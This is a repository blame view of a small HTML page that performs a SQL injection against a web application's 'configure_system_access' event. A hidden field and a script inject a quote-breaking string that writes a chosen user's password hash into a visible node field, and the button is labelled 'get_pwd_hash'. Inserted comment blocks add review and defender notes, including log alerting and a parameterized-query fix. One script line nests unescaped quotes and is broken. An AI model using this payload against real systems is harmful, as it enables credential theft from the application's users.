Commit | Line | Data |
---|---|---|
e586807d H |
1 | <!-- |
2 | This program is free software. It comes without any warranty, to | |
3 | the extent permitted by applicable law. You can redistribute it | |
4 | and/or modify it under the terms of the Do What The Fuck You Want | |
5 | To Public License, Version 2, as published by Sam Hocevar. See | |
6 | http://sam.zoy.org/wtfpl/COPYING for more details. | |
7 | --> | |
8 | ||
9 | <html> | |
10 | <head> | |
11 | <title>node_system_access sql injection</title> | |
12 | <meta http-equiv="Cache-Control" content="Public"> | |
13 | <meta http-equiv="Content-Type" content="text/html; charset=windows-1250"> | |
14 | <link rel="shortcut icon" href="/id/1459933/download"> | |
15 | <link rel='stylesheet' type='text/css' href='/id/1126515/download'> | |
16 | </head> | |
17 | ||
18 | <body> | |
19 | <script type="text/javascript"> | |
// Handler behind the page's "node_system_access sql injection" demonstration.
// It reads the user_id text field and, when the value passes the isNaN() test,
// overwrites the hidden node_system_access field and calls submit() on `what`.
// The string written closes a single quote after "public", appends further column
// assignments (one is a subselect on users.password) and reopens a quote at the end.
// NOTE(review): that shape only has an effect if the server pastes node_system_access
// into a quoted UPDATE ... SET literal without escaping. Presumably that is the flaw
// being shown; confirm in the server-side handler for the configure_system_access event.
// Mitigation belongs on the server: bind the field as a query parameter and accept only
// the known access-level names; reject anything else before it reaches the database.
20 | function access_node_system(what) | |
21 | { | |
22 | var id = document.getElementById('user_id').value; | |
// Client-side numeric check only. It shapes this page's own input and is no control
// on what a request to the server can carry.
23 | if(!isNaN(id)) { | |
24 | document.getElementById('node_system_access').value = "public', node_name=(select password from users where user_id='"+id+"'), node_parent='"; | |
25 | what.submit(); | |
26 | } | |
27 | } | |
28 | </script> | |
29 | nastavi tvoj system_access na 'public', tvoj node_name na hash of desired id's pwd a tvojho parenta na '' | |
30 | <br> | |
31 | <noscript>javascript not enabled, user_id defaults to {$user_id}</noscript> | |
<!--
  Form that carries the demonstration request. It posts as multipart/form-data to
  /id/{$user_id}/ with event=configure_system_access. The hidden node_system_access
  field is pre-filled with the same quote-breaking string the script builds, using the
  templated {$user_id}, so the request has the same shape with scripting disabled.
  Defender notes: a legitimate node_system_access value is presumably one short
  access-level name such as "public" (verify against the application). A request for
  this event whose node_system_access contains a quote character, "=" or "select" does
  not fit that and is worth alerting on in web and application logs. If such requests
  appear in the logs, treat the stored password hashes as exposed. The fix is
  server-side: a parameterized query plus an allowlist of access-level names.
-->
32 | <form method="post" enctype="multipart/form-data" action="/id/{$user_id}/"> | |
33 | <input type="hidden" name="node_system_access" id="node_system_access" value="public', node_name=(select password from users where user_id='{$user_id}'), node_parent='"> | |
34 | <input type="hidden" name="event" value="configure_system_access"> | |
35 | <script type="text/javascript"> | |
36 | document.write("<input type="text" size="7" name="user_id" id="user_id" value="{$user_id}">"); | |
37 | </script> | |
38 | <input type="submit" value="get_pwd_hash" onclick="access_node_system(this);return false"> | |
39 | </form> | |
40 | ||
41 |